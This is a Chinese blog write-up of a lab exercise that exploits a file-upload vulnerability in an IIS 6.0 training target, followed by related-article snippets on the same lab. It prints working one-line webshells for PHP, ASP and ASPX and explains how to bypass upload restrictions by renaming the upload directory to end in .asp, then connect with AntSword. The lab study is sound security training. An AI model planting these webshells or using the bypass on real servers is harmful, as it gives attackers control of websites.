[靶场练习]内部文件上传系统漏洞分析溯源

最新推荐文章于 2024-11-04 12:22:27 发布
最新推荐文章于 2024-11-04 12:22:27 发布
阅读量251 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24481913/article/details/132063851
版权
本文分析了文件上传漏洞的原理,强调了其作为web安全威胁的重要性,特别是针对asp、aspx文件的攻击方式,以及如何通过检查前端验证和服务器配置来利用一句话木马。作者演示了如何通过设置上传路径和使用蚁剑进行操作。
摘要由CSDN通过智能技术生成

内部文件上传系统漏洞分析溯源

文件上传漏洞

介绍

文件上传漏洞是web安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞。

原理

文件上传漏洞是web安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞。

一句话木马

php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是:   <%eval request ("pass")%>
aspx的一句话是:  <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

具体这里Web安全-一句话木马

解题

进入靶场
file
看到有一个文件上传界面
首先我们需要检查一下前端看一下有没有前端验证。
file
没有前端验证
尝试传入一个txt
file
上传路径居然是个.asp
file

当你上传的木马如asp/aspx,必须在IIS6.0环境,且在以x.asp为名称的文件夹下面,才能执行图片里的代码,也就是说,图片木马执行必须满足2个条件:A:你可以自建x.asp文件夹;B:你需要上传图片木马到x.asp文件夹下;其实,如果网站没有IDS,WAF,webshell查杀工具等等的对文件真正属性的检查,你也可以不使用图片一句话,你也可以直接将asp/aspx小马的后缀直接修改为JPG or PNG等等,然后上传;为什么呢?因为现在只有网站应用程序在检查文件的后缀,并没有检查文件真正的属性,然后就是没有防火墙如:IDS,WAF等,自然而然也就可以绕过并上传,但前提还是,你必须能在服务器自建x.asp文件夹才行,并把马上传到x.asp文件夹之下,而且上传之后服务器没有webshell查杀工具等等的防御。
所以我们直接实操
file

编写一句话木马
开启bp的拦截模式
file
更改上传路径为aaa.asp,然后发送数据包
file
然后掏出蚁剑
file
file

5WDD
关注
文件上传漏洞练习靶场upload-labs
07-05
文件上传漏洞练习靶场upload-labs内有文件上传漏洞的各种类型绕过的例题,非常全面,对加深文件上传漏洞的理解、利用非常有帮助。
墨者题解_内部文件上传系统漏洞分析溯源
weixin_43072923的博客
04-08 422
墨者学院——内部文件上传系统漏洞分析溯源 根据背景: 我们可以尝试该页面做了什么防护: 首先尝试输入php或者asp文件,发现不行: 再次尝试txt、jpg等文件,发现可以上传: 通过F12查看其服务,为IIS/6.0: 上百度搜索IIS的漏洞,知道了当我们上传xxx.asp文件时,该文件以后的子文件都以asp文件来执行,例如ccooll.asp后面有子文件ccooll.jpg,则/ccooll.asp/ccooll.jpg以asp文件执行。 接下来,我们便开始getshel.
内部文件上传系统漏洞分析溯源
weixin_47493074的博客
09-16 463
首先根据服务器版本IIS6.0可以判断,利用IIS低版本的解析漏洞。2、IIS解析漏洞分为两种:(IIS6.0在解析asp格式的时候有两个解析漏洞,一个是如果目录名包含“.asp“字符串,那么这个目录下所有的文件都会按照asp去解析,另一个是只要文件名中含有".asp;实战:上传一个asp类型的一句话木马,一定要是asp类型的,然后burp抓包,在GuFolderPath下的upload为upload/*.asp,然后菜刀过去,脚本类型改asp,进入打开inetpub下wwwroot找到key。
文件上传漏洞 —— 内部文件上传系统漏洞分析溯源
vergilben的学习日记
04-11 1901
文件上传漏洞 —— 内部文件上传系统漏洞分析溯源 这篇主要复现墨者学院的一个内部文件上传漏洞,内部文件上传系统漏洞分析溯源,还有另一题会写到另一篇里面。 关于文件上传漏洞,前面我的博客里面有写原理以及简单的实现,再写一下其原理。 文件上传漏洞原理:大部分的网站和应用系统都有上传功能,如用户头像上传、图片上传、文档上传等。一些文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻...
墨者——内部文件上传系统漏洞分析溯源 内部文件上传系统漏洞分析溯源
m_de_g的博客
02-24 1117
7.经过测试发现不行,那么查看一下操作系统的版本Microsoft-IIS/6.0。6.有个问题就是服务器将我们所上传的文件进行了重命名,故我们应该想办法截断。8.看看此服务器有没有什么漏洞,发现此版本有文件解析漏洞。,那么此目录下的所有文件就会被当做asp执行。:使用菜刀连接,一开始我还以为马儿有问题。9.把文档中的内容替换成一句话木马。12.接下来,使用菜刀连接。5.上传报错,将其改名为。1.选择合适的文件上传。3.可以推测出此站点为。11.改上传的路径为。
墨者学院06 内部文件上传系统漏洞分析溯源
weixin_42789937的博客
01-28 468
墨者学院06 内部文件上传系统漏洞分析溯源~友情提示:这道题目我用蚁剑连接失败了,原因不知...所以有可能不是靠谱的WP...
墨者学院 内部文件上传系统漏洞分析溯源
人若无名,便可专心练剑
11-06 165
【代码】墨者学院 内部文件上传系统漏洞分析溯源
一文爽 文件上传漏洞原理、方法和类型详细解析
MachineGunJoe666
05-23 2132
文件上传漏洞是web系统中常见的一种功能,通过文件上传能实现上传图片、视频,以及其他类型的文件,但是随着web中包含的功能越来越多,潜在的网络安全风险也就越大。如果恶意用户上传了可执行的文件或者脚本,就会导致网站被其控制甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。
文件上传漏洞来练习靶场报告.zip
04-09
资料中详细介绍了如何在练习文件上传漏洞的靶场上进行操作。它指出了漏洞的上传点,这是攻击者可以利用的弱点。然后,它详细阐述了具体的操作步骤流程,包括如何找到上传点,如何构造恶意文件,以及如何通过上传恶意...
内部文件上传系统漏洞分析溯源(墨者学院)
m0_67352890的博客
10-27 412
内部文件上传系统漏洞分析溯源(墨者学院)
Web安全文件上传(解析)漏洞
zhdf160916的博客
11-21 6665
教学目标 理解文件上传漏洞原理 掌握几种文件上传绕过方法 一、文件上传漏洞介绍 文件上传文件上传是现代互联网常见的功能,允许用户上传图片、视频、及其他类型文件,向用户提供的功能越多,web受攻击的风险就越大。 1、文件上传漏洞 上传文件时,如果未对上传的文件进行严格的验证和过滤,就容易造成文件上传漏洞,上传脚本文件(asp、aspx、php、jsp等) 注:asp,aspx对应iis解析 php对应apache解析 jsp对应java(tomcat) 恶意上传行为可能导致网站甚至整个服务器被控制。恶
文件上传漏洞—简单利用2(墨者学院靶场
weixin_44431280的博客
03-01 1019
文件上传漏洞—简单利用(墨者学院靶场) 说明:文章中涉及的网站信息皆是墨者学院靶场环境,不涉及互联网真实环境,仅供学习。 上传思路: 步骤一:判断网站支持文件格式。从网站功能点或者题目说明可以判断处,该功能点支持上传图片格式(JPG,GIF和PNG等)文件 尝试上传文件名为poc.jpg和poc.php的图片:判断网站支持JPG格式文件上传 poc.jpg格式上传成功: poc.php格式上传失败: 步骤二:猜测网站拦截方式(前端JS/MIME类型/文件扩展名/黑白名单/文件内容检测/) JS前端,MI
靶场攻略 | 网络安全靶场合集
Python_0011的博客
10-11 4155
1JAVA环境。
一道文件上传漏洞的详细靶场写题流程——适合初学者
hyjcking的博客
10-18 1108
我们上传制作的图片马,发现上传成功,我们尝试连接phpinfo,但是却发现没有生成phpinfo,猜测是没传到根目录下或者被改名字。由于apache存在的多后缀文件解析漏洞,这里上传一个x.php.xxx(这里任何不可识别的后缀都行),即可绕过该正则限制。2.打开该目录的cmd,输入copy 1.jpg/b +1.php 88.jpg,就会生成88.jpg的图片马。需要将php文件达成zip包,然后,绕过路经检测,通过路径穿越将文件放到指定目录,然后访问。3.生成66.jpg的夹心图片马。
文件上传漏洞靶场通关教程(全)
jnszstmei的博客
07-18 1929
upload-labs靶场通关教程,从第一关到第二十一关,包含各种绕过以及图片马、条件竞争、代码审计等,适合文件上传漏洞练习
ICT网络赛道安全考点知识总结4
最新发布
m0_72765822的博客
11-04 547
RADIUS和HWTACACS协议通常都使用共享密钥对传输的用户信息进行加密,以确保安全传输。 用来封装EAP报文的RADIUS属性通常是"EAP-Message",它用于传输EAP认证过程中的消息。 LDAP的域名属性通常是"DC"(Domain Component),用于表示域名的组成部分。 BFD(Bidirectional Forwarding Detection)可以用于检测网络设备之间直连物理链路的双向转发路径的故障,但也可以用于检测其他类型的链路故障。 管理员为虚拟系统手工分配资源时,
upload-labs靶场WEB渗透文件上传漏洞21关系统学习
2. 靶场练习的重要性:通过在安全环境下的靶场练习,新手可以直观地理解文件上传漏洞的工作原理,以及实际攻击者的攻击手段。这种方式可以有效提升新手的安全意识和实战能力。 3. 关卡制训练模式:upload-labs采用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值